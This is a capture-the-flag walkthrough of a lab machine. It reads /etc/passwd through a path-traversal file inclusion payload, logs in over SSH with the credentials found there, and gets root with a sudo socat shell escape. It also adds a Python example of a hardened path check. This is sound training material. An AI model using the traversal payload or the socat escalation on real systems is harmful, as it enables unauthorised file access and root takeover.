# Inclusion

![](/files/-MbINDNY5NdZ8WY280xU)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```
nmap -Pn 10.10.101.147
```

![](/files/-MbINm9I2t4lsg8Nnh6c)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 22,80
* (**-oN nmap**): Saving the output into a file called nmap

```
nmap -sC -sV -p 22,80 -oN nmap 10.10.101.147
```

![](/files/-MbIO-UKqiB8ztWT-rTW)

## Enumeration

Let's visit the website.

![](/files/-MbIO7HVO6Wwmc1_0qp2)

Clicking through the website, we can see that the URL contains a parameter `name`.

![](/files/-MbIO_j_4wEi6WHXE02C)

As we move between pages, the word after the parameter changes, much like a path in a directory structure.

Local File Inclusion (LFI): a file inclusion vulnerability that most commonly affects web applications. An attacker uses LFI to trick the web application into exposing or running files on the web server. It may lead to information disclosure, remote code execution, cross-site scripting and many other vulnerabilities.

If the application is reading from a file system structure, the current location could be something like `/root/home/users/user/article/<file>`. To see important information such as the contents of the `/etc/passwd` file, we can go back a few directories and read the file, like this:

```
../../../../../../etc/passwd
```
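The traversal works when an application joins the `name` value onto a directory without checking where the result lands. As an added example (not code from this room or the original write-up), the following contrasts that naive join with a containment check; the function names and the `articles` directory are assumptions, and the sample tree is constructed.

```python
import os
import tempfile


def resolve_vulnerable(base_dir, name):
    # Naive pattern: the request value is joined onto the article directory
    # as-is, so "../" segments (or an absolute path) escape it.
    return os.path.normpath(os.path.join(base_dir, name))


def resolve_hardened(base_dir, name):
    # Canonicalise both paths (collapses "..", follows symlinks), then
    # require the result to stay under the article directory.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    # Constructed sample tree: <tmp>/articles/hacking stands in for a real article.
    root = os.path.realpath(tempfile.mkdtemp())
    articles = os.path.join(root, "articles")
    os.mkdir(articles)
    with open(os.path.join(articles, "hacking"), "w") as fh:
        fh.write("article body")
    requests = ["hacking", "../../../../../../etc/passwd", "/etc/passwd", "missing"]
    results = {
        name: (resolve_vulnerable(articles, name), resolve_hardened(articles, name))
        for name in requests
    }
    return results, articles


if __name__ == "__main__":
    results, _ = demo()
    for name, (weak, strong) in results.items():
        print(f"{name!r}: vulnerable -> {weak}, hardened -> {strong}")
```

The hardened resolver returns `None` for anything that resolves outside the article directory, which the caller should turn into a 404 rather than an error that echoes the path.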

![](/files/-MbIQ22xqzH3jjs6rBBg)

![](/files/-MbIQ_zWp2b_AQll1VsX)

And it works: we can see the `/etc/passwd` file. Reading through the file, we see a username and password that we can use to log in through SSH.

`Username: falconfeast`

`Password: rootpassword`

```
ssh falconfeast@10.10.101.147
```

![](/files/-MbIQs-Bsfw-8Objwumu)

We can now read the user flag.

![](/files/-MbIQxzEiGr93zpBcYxJ)

## Privilege Escalation

Let's run the command `sudo -l` to check what we can run as root.

```
sudo -l
```

![](/files/-MbIRKEm0oiDxqkBYyYz)

It looks like we can run `/usr/bin/socat` as root, so let's go to [GTFOBins](https://gtfobins.github.io/gtfobins/socat/#sudo) and find the commands to privilege escalate to root. They gave the command:

```
sudo socat stdin exec:/bin/sh
```

![](/files/-MbIRgP2Gyw1JTtX_GYW)

We are now root, so we can read the root flag and answer the last question of this room.

![](/files/-MbIRrN59E10jHDB-IB2)


